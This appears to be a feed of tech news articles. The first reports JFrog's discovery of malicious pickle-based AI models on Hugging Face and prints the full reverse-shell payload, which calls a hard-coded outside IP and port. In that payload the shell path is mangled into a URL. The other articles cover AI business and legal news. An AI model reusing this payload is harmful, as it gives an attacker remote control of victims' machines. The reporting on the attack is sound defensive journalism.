Hugging Face, the GitHub of AI, hosted code that backdoored user devices

IN A PICKLE —

Malicious submissions have been a fact of life for code repositories. AI is no different.

Code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines, researchers from security firm JFrog said Thursday in a report that’s a likely harbinger of what’s to come.

In all, JFrog researchers said, they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models—all of which went undetected by Hugging Face—appeared to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were “truly malicious” in that they performed actions that actually compromised the users’ security when loaded.

Full control of user devices

One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user’s device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.

That restraint, along with the IP address of the remote device and the existence of identical shells connecting elsewhere, raised the possibility that the submission was also the work of researchers. An exploit that opens a device to such tampering, however, is a major breach of researcher ethics and demonstrates that, just like code submitted to GitHub and other developer platforms, models available on AI sites can pose serious risks if not carefully vetted first.

“The model’s payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims’ machines through what is commonly referred to as a ‘backdoor,’” JFrog Senior Researcher David Cohen wrote. “This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations across the globe, all while leaving victims utterly unaware of their compromised state.”

A lab machine set up as a honeypot to observe what happened when the model was loaded.

JFrog

Secrets and other bait data the honeypot used to attract the threat actor.

JFrog

How baller423 did it

Like the other nine truly malicious models, the one discussed here used pickle, a format that has long been recognized as inherently risky. Pickle is commonly used in Python to convert objects and classes defined in human-readable code into a byte stream that can be saved to disk or shared over a network. This process, known as serialization, gives hackers the opportunity to sneak malicious code into the flow.

The model that spawned the reverse shell, submitted by a party with the username baller423, was able to evade Hugging Face’s malware scanner by using pickle’s “__reduce__” method to execute arbitrary code when the model file is loaded.
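To make the mechanism concrete, here is a minimal sketch of how a pickle’s “__reduce__” method turns deserialization into code execution. This is not the actual malicious model; the class name and command are invented for illustration.

import os
import pickle

class Payload:
    # __reduce__ tells pickle how to rebuild this object. Returning
    # (os.system, (command,)) means unpickling calls os.system(command)
    # instead of reconstructing a harmless object.
    def __reduce__(self):
        return (os.system, ('echo "this ran at unpickling time"',))

blob = pickle.dumps(Payload())  # looks like inert serialized data
pickle.loads(blob)              # merely loading it runs the command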

JFrog’s Cohen explained the process in more technical detail:

In loading PyTorch models with transformers, a common approach involves utilizing the torch.load() function, which deserializes the model from a file. Particularly when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often employed to load the model along with its architecture, weights, and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2,” it appears that the malicious payload was injected into the PyTorch model file using the __reduce__ method of the pickle module. This method, as demonstrated in the provided reference, enables attackers to insert arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.

Upon analysis of the PyTorch file using the fickling tool, we successfully extracted the following payload:

RHOST = "210.117.212.93"  RPORT = 4242    from sys import platform    if platform != 'win32':      import threading      import socket      import pty      import os        def connect_and_spawn_shell():          s = socket.socket()          s.connect((RHOST, RPORT))          [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]          pty.spawn("https://arstechnica.com/bin/sh")        threading.Thread(target=connect_and_spawn_shell).start()  else:      import os      import socket      import subprocess      import threading      import sys        def send_to_process(s, p):          while True:              p.stdin.write(s.recv(1024).decode())              p.stdin.flush()        def receive_from_process(s, p):          while True:              s.send(p.stdout.read(1).encode())        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        while True:          try:              s.connect((RHOST, RPORT))              break          except:              pass        p = subprocess.Popen(["powershell.exe"],                            stdout=subprocess.PIPE,                           stderr=subprocess.STDOUT,                           stdin=subprocess.PIPE,                           shell=True,                           text=True)        threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()      threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()      p.wait()

Hugging Face has since removed the model and the others flagged by JFrog.
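For anyone loading third-party PyTorch checkpoints, a hedged mitigation sketch follows; the file names are placeholders, and these are general pickle-hardening options rather than JFrog’s specific recommendations. Recent PyTorch releases accept a weights_only flag that restricts unpickling to tensor data, and the safetensors format avoids pickle altogether.

import torch
from safetensors.torch import load_file  # optional safetensors package

# weights_only=True limits the unpickler to plain tensors and containers,
# so a __reduce__ payload raises an error instead of executing.
state_dict = torch.load("model.bin", weights_only=True)

# safetensors stores raw tensor data with no executable deserialization step.
safe_state_dict = load_file("model.safetensors")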

Elon Musk sues OpenAI and Sam Altman, accusing them of chasing profits

YA Musk lawsuit —

OpenAI is now a “closed-source de facto subsidiary” of Microsoft, says lawsuit.

Elon Musk has sued OpenAI and its chief executive Sam Altman for breach of contract, alleging they have compromised the start-up’s original mission of building artificial intelligence systems for the benefit of humanity.

In the lawsuit, filed in a San Francisco court on Thursday, Musk’s lawyers wrote that OpenAI’s multibillion-dollar alliance with Microsoft had broken an agreement to make a major breakthrough in AI “freely available to the public.”

Instead, the lawsuit said, OpenAI was working on “proprietary technology to maximise profits for literally the largest company in the world.”

The legal fight escalates a long-running dispute between Musk, who has founded his own AI company, known as xAI, and OpenAI, which has received a $13 billion investment from Microsoft.

Musk, who helped co-found OpenAI in 2015, said in his legal filing he had donated $44 million to the group, and had been “induced” to make contributions by promises, “including in writing,” that it would remain a non-profit organisation.

He left OpenAI’s board in 2018 following disagreements with Altman on the direction of research. A year later, the group established the for-profit arm that Microsoft has invested into.

Microsoft’s president Brad Smith told the Financial Times this week that while the companies were “very important partners,” “Microsoft does not control OpenAI.”

Musk’s lawsuit alleges that OpenAI’s latest AI model, GPT-4, released in March last year, breached the threshold for artificial general intelligence (AGI), at which computers function at or above the level of human intelligence.

The Microsoft deal only gives the tech giant a licence to OpenAI’s pre-AGI technology, the lawsuit said, and determining when this threshold is reached is key to Musk’s case.

The lawsuit seeks a court judgment over whether GPT-4 should already be considered to be AGI, arguing that OpenAI’s board was “ill-equipped” to make such a determination.

The filing adds that OpenAI is also building another model, Q*, that will be even more powerful and capable than GPT-4. It argues that OpenAI is committed under the terms of its founding agreement to make such technology available publicly.

“Mr. Musk has long recognised that AGI poses a grave threat to humanity—perhaps the greatest existential threat we face today,” the lawsuit says.

“To this day, OpenAI, Inc.’s website continues to profess that its charter is to ensure that AGI ‘benefits all of humanity’,” it adds. “In reality, however, OpenAI, Inc. has been transformed into a closed-source de facto subsidiary of the largest technology company in the world: Microsoft.”

OpenAI maintains it has not yet achieved AGI, despite its models’ success in language and reasoning tasks. Large language models like GPT-4 still generate errors, fabrications, and so-called hallucinations.

The lawsuit also seeks to “compel” OpenAI to adhere to its founding agreement to build technology that does not simply benefit individuals such as Altman and corporations such as Microsoft.

Musk’s own xAI company is a direct competitor to OpenAI and launched its first product, a chatbot named Grok, in December.

OpenAI declined to comment. Representatives for Musk have been approached for comment. Microsoft did not immediately respond to a request for comment.

The Microsoft-OpenAI alliance is being reviewed by competition watchdogs in the US, EU and UK.

The US Securities and Exchange Commission issued subpoenas to OpenAI executives in November as part of an investigation into whether Altman had misled its investors, according to people familiar with the move.

That investigation came shortly after OpenAI’s board fired Altman as chief executive only to reinstate him days later. A new board has since been instituted including former Salesforce co-chief executive Bret Taylor as chair.

Independent law firm WilmerHale is conducting an ongoing review of the former board’s allegations against Altman.

© 2024 The Financial Times Ltd. All rights reserved. Not to be redistributed, copied, or modified in any way.

AI-generated articles prompt Wikipedia to downgrade CNET’s reliability rating

The hidden costs of AI —

Futurism report highlights the reputational cost of publishing AI-generated content.

The CNET logo on a smartphone screen.

Wikipedia has downgraded tech website CNET’s reliability rating following extensive discussions among its editors regarding the impact of AI-generated content on the site’s trustworthiness, as noted in a detailed report from Futurism. The decision reflects concerns over the reliability of articles found on the tech news outlet after it began publishing AI-generated stories in 2022.

Around November 2022, CNET began publishing articles written by an AI model under the byline “CNET Money Staff.” In January 2023, Futurism discovered that the articles were riddled with plagiarism and mistakes and brought widespread attention to the issue. (Around that time, we covered plans to do similar automated publishing at BuzzFeed.) After the revelation, CNET management paused the experiment, but the reputational damage had already been done.

Wikipedia maintains a page called “Reliable sources/Perennial sources” that includes a chart featuring news publications and their reliability ratings as viewed from Wikipedia’s perspective. Shortly after the CNET news broke in January 2023, Wikipedia editors began a discussion thread on the Reliable Sources project page about the publication.

“CNET, usually regarded as an ordinary tech RS [reliable source], has started experimentally running AI-generated articles, which are riddled with errors,” wrote a Wikipedia editor named David Gerard. “So far the experiment is not going down well, as it shouldn’t. I haven’t found any yet, but any of these articles that make it into a Wikipedia article need to be removed.”

After other editors agreed in the discussion, they began the process of downgrading CNET’s reliability rating.

As of this writing, Wikipedia’s Perennial Sources list features three entries for CNET broken into three time periods: (1) before October 2020, when Wikipedia considered CNET a “generally reliable” source; (2) between October 2020 and October 2022, where Wikipedia notes that the site was acquired by Red Ventures in October 2020, “leading to a deterioration in editorial standards,” and says there is no consensus about reliability; and (3) between November 2022 and the present, where Wikipedia considers CNET “generally unreliable” after the site began using an AI tool “to rapidly generate articles riddled with factual inaccuracies and affiliate links.”

A screenshot of a chart featuring CNET’s reliability ratings, as found on Wikipedia’s “Perennial Sources” page.

Futurism reports that the issue with CNET’s AI-generated content also sparked a broader debate within the Wikipedia community about the reliability of sources owned by Red Ventures, such as Bankrate and CreditCards.com. Those sites published AI-generated content around the same period of time as CNET. The editors also criticized Red Ventures for not being forthcoming about where and how AI was being implemented, further eroding trust in the company’s publications. This lack of transparency was a key factor in the decision to downgrade CNET’s reliability rating.

In response to the downgrade and the controversies surrounding AI-generated content, CNET issued a statement claiming that the site maintains high editorial standards.

“CNET is the world’s largest provider of unbiased tech-focused news and advice,” a CNET spokesperson said in a statement to Futurism. “We have been trusted for nearly 30 years because of our rigorous editorial and product review standards. It is important to clarify that CNET is not actively using AI to create new content. While we have no specific plans to restart, any future initiatives would follow our public AI policy.”

This article was updated on March 1, 2024, at 9:30 am to reflect fixes in the date ranges for CNET on the Perennial Sources page.

Microsoft partners with OpenAI-rival Mistral for AI models, drawing EU scrutiny

The European Approach —

15M euro investment comes as Microsoft hosts Mistral’s GPT-4 alternatives on Azure.

Velib bicycles parked in front of Microsoft’s French headquarters in Issy-les-Moulineaux, France, on January 25, 2023.

On Monday, Microsoft announced plans to offer AI models from Mistral through its Azure cloud computing platform, a deal that came in conjunction with a 15 million euro non-equity investment in the French firm, which is often seen as a European rival to OpenAI. Since then, the investment deal has faced scrutiny from European Union regulators.

Microsoft’s deal with Mistral, known for its large language models akin to OpenAI’s GPT-4 (which powers the subscription versions of ChatGPT), marks a notable expansion of its AI portfolio at a time when its well-known investment in California-based OpenAI has raised regulatory eyebrows. The new deal with Mistral drew particular attention from regulators because Microsoft’s investment could convert into equity (partial ownership of Mistral as a company) during Mistral’s next funding round.

The development has intensified ongoing investigations into Microsoft’s practices, particularly related to the tech giant’s dominance in the cloud computing sector. According to Reuters, EU lawmakers have voiced concerns that Mistral’s recent lobbying for looser AI regulations might have been influenced by its relationship with Microsoft. These apprehensions are compounded by the French government’s denial of prior knowledge of the deal, despite earlier lobbying for more lenient AI laws in Europe. The situation underscores the complex interplay between national interests, corporate influence, and regulatory oversight in the rapidly evolving AI landscape.

Avoiding American influence

The EU’s reaction to the Microsoft-Mistral deal reflects broader tensions over the role of Big Tech companies in shaping the future of AI and their potential to stifle competition. Calls for a thorough investigation into Microsoft and Mistral’s partnership have been echoed across the continent, according to Reuters, with some lawmakers accusing the firms of attempting to undermine European legislative efforts aimed at ensuring a fair and competitive digital market.

The controversy also touches on the broader debate about “European champions” in the tech industry. France, along with Germany and Italy, had advocated for regulatory exemptions to protect European startups. However, the Microsoft-Mistral deal has led some, like MEP Kim van Sparrentak, to question the motives behind these exemptions, suggesting they might have inadvertently favored American Big Tech interests.

“That story seems to have been a front for American-influenced Big Tech lobby,” said Sparrentak, as quoted by Reuters. Sparrentak has been a key architect of the EU’s AI Act, which has not yet been passed. “The Act almost collapsed under the guise of no rules for ‘European champions,’ and now look. European regulators have been played.”

MEP Alexandra Geese also expressed concerns over the concentration of money and power resulting from such partnerships, calling for an investigation. Max von Thun, Europe director at the Open Markets Institute, emphasized the urgency of investigating the partnership, criticizing Mistral’s reported attempts to influence the AI Act.

Also on Monday, amid the partnership news, Mistral announced Mistral Large, a new large language model (LLM) that Mistral says “ranks directly after GPT-4 based on standard benchmarks.” Mistral has previously released several open-weights AI models that have made news for their capabilities, but Mistral Large will be a closed model only available to customers through an API.

OpenAI accuses NYT of hacking ChatGPT to set up copyright suit

OpenAI is now boldly claiming that The New York Times “paid someone to hack OpenAI’s products” like ChatGPT to “set up” a lawsuit against the leading AI maker.

In a court filing Monday, OpenAI alleged that “100 examples in which some version of OpenAI’s GPT-4 model supposedly generated several paragraphs of Times content as outputs in response to user prompts” do not reflect how normal people use ChatGPT.

Instead, it allegedly took The Times “tens of thousands of attempts to generate” these supposedly “highly anomalous results” by “targeting and exploiting a bug” that OpenAI claims it is now “committed to addressing.”

According to OpenAI this activity amounts to “contrived attacks” by a “hired gun”—who allegedly hacked OpenAI models until they hallucinated fake NYT content or regurgitated training data to replicate NYT articles. NYT allegedly paid for these “attacks” to gather evidence to support The Times’ claims that OpenAI’s products imperil its journalism by allegedly regurgitating reporting and stealing The Times’ audiences.

“Contrary to the allegations in the complaint, however, ChatGPT is not in any way a substitute for a subscription to The New York Times,” OpenAI argued in a motion that seeks to dismiss the majority of The Times’ claims. “In the real world, people do not use ChatGPT or any other OpenAI product for that purpose. Nor could they. In the ordinary course, one cannot use ChatGPT to serve up Times articles at will.”

In the filing, OpenAI described The Times as enthusiastically reporting on its chatbot developments for years without raising any concerns about copyright infringement. OpenAI claimed that it disclosed that The Times’ articles were used to train its AI models in 2020, but The Times only cared after ChatGPT’s popularity exploded after its debut in 2022.

According to OpenAI, “It was only after this rapid adoption, along with reports of the value unlocked by these new technologies, that the Times claimed that OpenAI had ‘infringed its copyright[s]’ and reached out to demand ‘commercial terms.’ After months of discussions, the Times filed suit two days after Christmas, demanding ‘billions of dollars.'”

Ian Crosby, Susman Godfrey partner and lead counsel for The New York Times, told Ars that “what OpenAI bizarrely mischaracterizes as ‘hacking’ is simply using OpenAI’s products to look for evidence that they stole and reproduced The Times’s copyrighted works. And that is exactly what we found. In fact, the scale of OpenAI’s copying is much larger than the 100-plus examples set forth in the complaint.”

Crosby told Ars that OpenAI’s filing notably “doesn’t dispute—nor can they—that they copied millions of The Times’ works to build and power its commercial products without our permission.”

“Building new products is no excuse for violating copyright law, and that’s exactly what OpenAI has done on an unprecedented scale,” Crosby said.

OpenAI argued that the court should dismiss claims alleging direct copyright, contributory infringement, Digital Millennium Copyright Act violations, and misappropriation, all of which it describes as “legally infirm.” Some fail because they are time-barred—seeking damages on training data for OpenAI’s older models—OpenAI claimed. Others allegedly fail because they misunderstand fair use or are preempted by federal laws.

If OpenAI’s motion is granted, the case would be substantially narrowed.

But if the motion is not granted and The Times ultimately wins—and it might—OpenAI may be forced to wipe ChatGPT and start over.

“OpenAI, which has been secretive and has deliberately concealed how its products operate, is now asserting it’s too late to bring a claim for infringement or hold them accountable. We disagree,” Crosby told Ars. “It’s noteworthy that OpenAI doesn’t dispute that it copied Times works without permission within the statute of limitations to train its more recent and current models.”

OpenAI did not immediately respond to Ars’ request to comment.

Wendy’s will experiment with dynamic surge pricing for food in 2025

Sir, this is Wendy’s new AI-powered menu —

Surge pricing test next year means your cheeseburger may get more expensive at 6 pm.

A view of a Wendy’s store on August 9, 2023, in Nanuet, New York.

American fast food chain Wendy’s is planning to test dynamic pricing and AI menu features in 2025, report Nation’s Restaurant News and Food & Wine. This means that prices for food items will automatically change throughout the day depending on demand, similar to “surge pricing” in rideshare apps like Uber and Lyft. The initiative was disclosed by Kirk Tanner, the CEO and president of Wendy’s, in a recent discussion with analysts.

According to Tanner, Wendy’s plans to invest approximately $20 million to install digital menu boards capable of displaying these real-time variable prices across all of its company-operated locations in the United States. An additional $10 million is earmarked over two years to enhance Wendy’s global system, which aims to improve order accuracy and upsell other menu items.

In conversation with Food & Wine, a spokesperson for Wendy’s confirmed the company’s commitment to this pricing strategy, describing it as part of a broader effort to grow its digital business. “Beginning as early as 2025, we will begin testing a variety of enhanced features on these digital menuboards like dynamic pricing, different offerings in certain parts of the day, AI-enabled menu changes and suggestive selling based on factors such as weather,” they said. “Dynamic pricing can allow Wendy’s to be competitive and flexible with pricing, motivate customers to visit and provide them with the food they love at a great value. We will test a number of features that we think will provide an enhanced customer and crew experience.”

A Wendy's drive-through menu as seen in 2023 during the FreshAI rollout.

Enlarge / A Wendy’s drive-through menu as seen in 2023 during the FreshAI rollout.

Wendy’s is not the first business to explore dynamic pricing—it’s a common practice in several industries, including hospitality, retail, airline travel, and the aforementioned rideshare apps. Its application in the fast-food sector is largely untested, and it’s uncertain how customers will react. However, a few other restaurants have tested the method and have experienced favorable results. “For us, it was all about consumer reaction,” Faizan Khan, a Dog Haus franchise owner, told Food & Wine. “The concern was if you’re going to raise prices, you’re going to sell less product, and it turns out that really wasn’t the case.”

The price-change plans are the latest in a series of moves designed to modernize Wendy’s business using technology—and increase profits. In 2023, Wendy’s began testing FreshAI, a system designed to take orders with a conversational AI bot, potentially replacing human workers in the process. In his discussion with analysts, Tanner also mentioned “AI-enabled menu changes” and “suggestive selling” without elaboration, though the Wendy’s spokesperson remarked that suggestive selling may dynamically emphasize some items based on local weather conditions, such as trying to sell cold drinks on a hot day.

If Wendy’s goes through with its plan, it’s unclear how the dynamic pricing will affect food delivery apps such as Uber Eats or Doordash, or even the Wendy’s mobile app. Presumably, third-party apps will need a way to link into Wendy’s dynamic price system (Wendy’s API anyone?).

In other news, Wendy’s is also testing “Saucy Nuggets” in a small number of restaurants near the chain’s Ohio headquarters. Refreshingly, they have nothing to do with AI.

After a decade of stops and starts, Apple kills its electric car project

Project Titan —

Report claims Apple leadership worried profit margins simply wouldn’t be there.

Apple’s global headquarters in Cupertino, California.

After 10 years of development, multiple changes in direction and leadership, and a plethora of leaks, Apple has reportedly ended work on its electric car project. According to a report in Bloomberg, the company is shifting some of the staff to work on generative AI projects within the company and planning layoffs for some others.

Internally dubbed Project Titan, the long-in-development car would have ideally had a luxurious, limo-like interior, robust self-driving capabilities, and at least a $100,000 price tag. However, the ambition of the project was drawn down with time. For example, it was once planned to have Level 4 self-driving capabilities, but that was scaled back to Level 2+.

Delays had pushed the car (on which work initially began way back in 2014) to a target release date of 2028. Now it won’t be released at all.

The decision was “finalized by Apple’s most senior executives in recent weeks,” according to Bloomberg’s sources. Apple’s leadership worried that the car might never find the profit margins they previously hoped for. This development won’t surprise many who have been following closely, though. The project has been known to be troubled for a while, and Apple would have had to face high startup costs and a difficult regulatory environment even had it been able to get a product together.

The shift in focus was announced to staff by Apple executives Jeff Williams and Kevin Lynch. Many employees who were working on the self-driving feature of the car will be moved under AI chief John Giannandrea to work on various projects, including generative AI. However, the fates of others who worked on other aspects of the car, like automobile engineering and design, are less certain. The report says layoffs are likely but doesn’t specify how many or on what timeline.

For a long time, it was known that Apple was investing in two major expansions: one into the automobile space and one into augmented reality. The first step in the latter was rolled out in the form of the Vision Pro headset a few weeks ago. With the car project canceled, Apple’s known areas of planned future expansion include mixed reality, wearables, and generative AI.

Reddit cashes in on AI gold rush with $203M in LLM training license fees

Your posts are the product —

Two- to three-year deals with Google, others, come amid legal uncertainty over “fair use.”

“Reddit Gold” takes on a whole new meaning when AI training data is involved.

Word leaked last week that Google had agreed to license Reddit’s massive corpus of billions of posts and comments to help train its large language models. Now, in a recent Securities and Exchange Commission filing, the popular online forum has revealed that it will bring in $203 million from that and other unspecified AI data licensing contracts over the next three years.

Reddit’s Form S-1—published by the SEC late Thursday ahead of the site’s planned stock IPO—says the company expects $66.4 million of that data licensing revenue to come during the 2024 calendar year. Bloomberg previously reported the Google deal to be worth an estimated $60 million a year, suggesting that the three-year deal represents the vast majority of Reddit’s AI licensing revenue so far.

Google and other AI companies that license Reddit’s data will receive “continuous access to [Reddit’s] data API as well as quarterly transfers of Reddit data over the term of the arrangement,” according to the filing. That constant, real-time access is particularly valuable, the site writes in the filing, because “Reddit data constantly grows and regenerates as users come and interact with their communities and each other.”

“Why pay for the cow…?”

While Reddit sees data licensing to AI firms as an important part of its financial future, its filing also notes that free use of its data has already been “a foundational part of how many of the leading large language models have been trained.” The filing seems almost bitter in noting that “some companies have constructed very large commercial language models using Reddit data without entering into a license agreement with us.”

That acknowledgment highlights the still-murky legal landscape over AI companies’ penchant for scraping huge swathes of the public web for training purposes, a practice those companies defend as fair use. And Reddit seems well aware that AI models may continue to hoover up its posts and comments for free, even as it tries to sell that data to others.

“Some companies may decline to license Reddit data and use such data without license given its open nature, even if in violation of the legal terms governing our services,” the company writes. “While we plan to vigorously enforce against such entities, such enforcement activities could take years to resolve, result in substantial expense, and divert management’s attention and other resources, and we may not ultimately be successful.”

Yet the mere existence of AI data licensing agreements like Reddit’s may influence how legal battles over this kind of data scraping play out. As Ars’ Timothy Lee and James Grimmelmann noted in a recent legal analysis, the establishment of a settled licensing market can have a huge impact on whether courts consider a novel use of digitized data to be “fair use” under copyright law.

“The more [AI data licensing] deals like this are signed in the coming months, the easier it will be for the plaintiffs to argue that the ‘effect on the market’ prong of fair use analysis should take this licensing market into account,” Lee and Grimmelmann wrote.

And while Reddit sees LLMs as a new revenue opportunity, the site also sees their popularity as a potential threat. The S-1 filing notes that “some users are also turning to LLMs such as ChatGPT, Gemini, and Anthropic” for seeking information, putting them in the same category of Reddit competition as “Google, Amazon, YouTube, Wikipedia, X, and other news sites.”

Reddit first filed for its IPO in late 2021, and reports suggest the company is now aiming to officially hit the stock market next month. The company will offer users and moderators with sufficient karma and/or activity on the site the opportunity to participate in that IPO through a directed share program.

Advance Publications, which owns Ars Technica parent Condé Nast, is the largest shareholder of Reddit.

Tyler Perry puts $800 million studio expansion on hold because of OpenAI’s Sora

The Synthetic Screen —

Perry: Mind-blowing AI video-generation tools “will touch every corner of our industry.”

Tyler Perry in 2022.

In an interview with The Hollywood Reporter published Thursday, filmmaker Tyler Perry spoke about his concerns related to the impact of AI video synthesis on entertainment industry jobs. In particular, he revealed that he has suspended a planned $800 million expansion of his production studio after seeing what OpenAI’s recently announced AI video generator Sora can do.

“I have been watching AI very closely,” Perry said in the interview. “I was in the middle of, and have been planning for the last four years… an $800 million expansion at the studio, which would’ve increased the backlot a tremendous size—we were adding 12 more soundstages. All of that is currently and indefinitely on hold because of Sora and what I’m seeing. I had gotten word over the last year or so that this was coming, but I had no idea until I saw recently the demonstrations of what it’s able to do. It’s shocking to me.”

OpenAI, the company behind ChatGPT, revealed a preview of Sora’s capabilities last week. Sora is a text-to-video synthesis model, and it uses a neural network—previously trained on video examples—that can take written descriptions of a scene and turn them into high-definition video clips up to 60 seconds long. Sora caused shock in the tech world because it appeared to surpass other AI video generators in capability dramatically. It seems that a similar shock also rippled into adjacent professional fields. “Being told that it can do all of these things is one thing, but actually seeing the capabilities, it was mind-blowing,” Perry said in the interview.

Tyler Perry Studios, which the actor and producer acquired in 2015, is a 330-acre lot located in Atlanta and is one of the largest film production facilities in the United States. Perry, who is perhaps best known for his series of Madea films, says that technology like Sora worries him because it could make the need for building sets or traveling to locations obsolete. He cites examples of virtual shooting in the snow of Colorado or on the Moon just by using a text prompt. “This AI can generate it like nothing.” The technology may represent a radical reduction in costs necessary to create a film, and that will likely put entertainment industry jobs in jeopardy.

“It makes me worry so much about all of the people in the business,” he told The Hollywood Reporter. “Because as I was looking at it, I immediately started thinking of everyone in the industry who would be affected by this, including actors and grip and electric and transportation and sound and editors, and looking at this, I’m thinking this will touch every corner of our industry.”

You can read the full interview at The Hollywood Reporter, which did an excellent job of covering Perry’s thoughts on a technology that may end up fundamentally disrupting Hollywood. To his mind, AI tech poses an existential risk to the entertainment industry that it can’t ignore: “There’s got to be some sort of regulations in order to protect us. If not, I just don’t see how we survive.”

Perry also looks beyond Hollywood and says that it’s not just filmmaking that needs to be on alert, and he calls for government action to help retain human employment in the age of AI. “If you look at it across the world, how it’s changing so quickly, I’m hoping that there’s a whole government approach to help everyone be able to sustain.”

Stability announces Stable Diffusion 3, a next-gen AI image generator

Pics and it didn’t happen —

SD3 may bring DALL-E-like prompt fidelity to an open-weights image-synthesis model.

Stable Diffusion 3 generation with the prompt: studio photograph closeup of a chameleon over a black background.

On Thursday, Stability AI announced Stable Diffusion 3, an open-weights next-generation image-synthesis model. It follows its predecessors by reportedly generating detailed, multi-subject images with improved quality and accuracy in text generation. The brief announcement was not accompanied by a public demo, but Stability is opening up a waitlist today for those who would like to try it.

Stability says that its Stable Diffusion 3 family of models (which takes text descriptions called “prompts” and turns them into matching images) ranges in size from 800 million to 8 billion parameters. The size range allows different versions of the model to run locally on a variety of devices—from smartphones to servers. Parameter size roughly corresponds to model capability in terms of how much detail it can generate. Larger models also require more VRAM on GPU accelerators to run.

Since 2022, we’ve seen Stability launch a progression of AI image-generation models: Stable Diffusion 1.4, 1.5, 2.0, 2.1, XL, XL Turbo, and now 3. Stability has made a name for itself as providing a more open alternative to proprietary image-synthesis models like OpenAI’s DALL-E 3, though not without controversy due to the use of copyrighted training data, bias, and the potential for abuse. (This has led to lawsuits that are unresolved.) Stable Diffusion models have been open-weights and source-available, which means the models can be run locally and fine-tuned to change their outputs.

  • Stable Diffusion 3 generation with the prompt: Epic anime artwork of a wizard atop a mountain at night casting a cosmic spell into the dark sky that says “Stable Diffusion 3” made out of colorful energy.

  • An AI-generated image of a grandma wearing a “Go big or go home sweatshirt” generated by Stable Diffusion 3.

  • Stable Diffusion 3 generation with the prompt: Three transparent glass bottles on a wooden table. The one on the left has red liquid and the number 1. The one in the middle has blue liquid and the number 2. The one on the right has green liquid and the number 3.

  • An AI-generated image created by Stable Diffusion 3.

  • Stable Diffusion 3 generation with the prompt: A horse balancing on top of a colorful ball in a field with green grass and a mountain in the background.

  • Stable Diffusion 3 generation with the prompt: Moody still life of assorted pumpkins.

  • Stable Diffusion 3 generation with the prompt: a painting of an astronaut riding a pig wearing a tutu holding a pink umbrella, on the ground next to the pig is a robin bird wearing a top hat, in the corner are the words “stable diffusion.”

  • Stable Diffusion 3 generation with the prompt: Resting on the kitchen table is an embroidered cloth with the text ‘good night’ and an embroidered baby tiger. Next to the cloth there is a lit candle. The lighting is dim and dramatic.

  • Stable Diffusion 3 generation with the prompt: Photo of an 90’s desktop computer on a work desk, on the computer screen it says “welcome”. On the wall in the background we see beautiful graffiti with the text “SD3” very large on the wall.

As far as tech improvements are concerned, Stability CEO Emad Mostaque wrote on X, “This uses a new type of diffusion transformer (similar to Sora) combined with flow matching and other improvements. This takes advantage of transformer improvements & can not only scale further but accept multimodal inputs.”

As Mostaque said, the Stable Diffusion 3 family uses diffusion transformer architecture, which is a new way of creating images with AI that swaps out the usual image-building blocks (such as U-Net architecture) for a system that works on small pieces of the picture. The method was inspired by transformers, which are good at handling patterns and sequences. This approach not only scales up efficiently but also reportedly produces higher-quality images.

Stable Diffusion 3 also utilizes “flow matching,” which is a technique for creating AI models that can generate images by learning how to transition from random noise to a structured image smoothly. It does this without needing to simulate every step of the process, instead focusing on the overall direction or flow that the image creation should follow.
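To make “learning the flow” concrete, below is a toy sketch of a conditional flow-matching objective as described in the research literature. This is not Stability’s training code; the tiny network and two-dimensional “data” distribution are invented for illustration. A network learns the velocity that carries noise toward data along straight-line paths, and sampling integrates that learned velocity field.

import torch
import torch.nn as nn

# Velocity network v(x_t, t): input is a 2D point plus the time t.
net = nn.Sequential(nn.Linear(3, 64), nn.SiLU(), nn.Linear(64, 2))
opt = torch.optim.Adam(net.parameters(), lr=1e-3)

for step in range(2000):
    x1 = torch.randn(256, 2) * 0.1 + 1.0  # stand-in "data" samples
    x0 = torch.randn(256, 2)              # pure noise samples
    t = torch.rand(256, 1)
    xt = (1 - t) * x0 + t * x1            # point on the straight path
    v_target = x1 - x0                    # velocity along that path
    v_pred = net(torch.cat([xt, t], dim=1))
    loss = ((v_pred - v_target) ** 2).mean()
    opt.zero_grad()
    loss.backward()
    opt.step()

# Sampling: start from noise and take a few Euler steps along the flow.
x = torch.randn(16, 2)
steps = 10
for i in range(steps):
    t = torch.full((16, 1), i / steps)
    x = x + net(torch.cat([x, t], dim=1)) / steps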

A comparison of outputs between OpenAI’s DALL-E 3 and Stable Diffusion 3 with the prompt, “Night photo of a sports car with the text ‘SD3’ on the side, the car is on a race track at high speed, a huge road sign with the text ‘faster.’”

We do not have access to Stable Diffusion 3 (SD3), but from samples we found posted on Stability’s website and associated social media accounts, the generations appear roughly comparable to other state-of-the-art image-synthesis models at the moment, including the aforementioned DALL-E 3, Adobe Firefly, Imagine with Meta AI, Midjourney, and Google Imagen.

SD3 appears to handle text generation very well in the examples provided by others, which are potentially cherry-picked. Text generation was a particular weakness of earlier image-synthesis models, so an improvement to that capability in a free model is a big deal. Also, prompt fidelity (how closely it follows descriptions in prompts) seems to be similar to DALL-E 3, but we haven’t tested that ourselves yet.

While Stable Diffusion 3 isn’t widely available, Stability says that once testing is complete, its weights will be free to download and run locally. “This preview phase, as with previous models,” Stability writes, “is crucial for gathering insights to improve its performance and safety ahead of an open release.”

Stability has been experimenting with a variety of image-synthesis architectures recently. Aside from SDXL and SDXL Turbo, just last week, the company announced Stable Cascade, which uses a three-stage process for text-to-image synthesis.

Listing image by Emad Mostaque (Stability AI)

Google launches “Gemini Business” AI, adds $20 to the $6 Workspace bill

$6 for apps like Gmail and Docs, and $20 for an AI bot? —

Google’s AI add-on costs over 3x the usual Workspace bill.

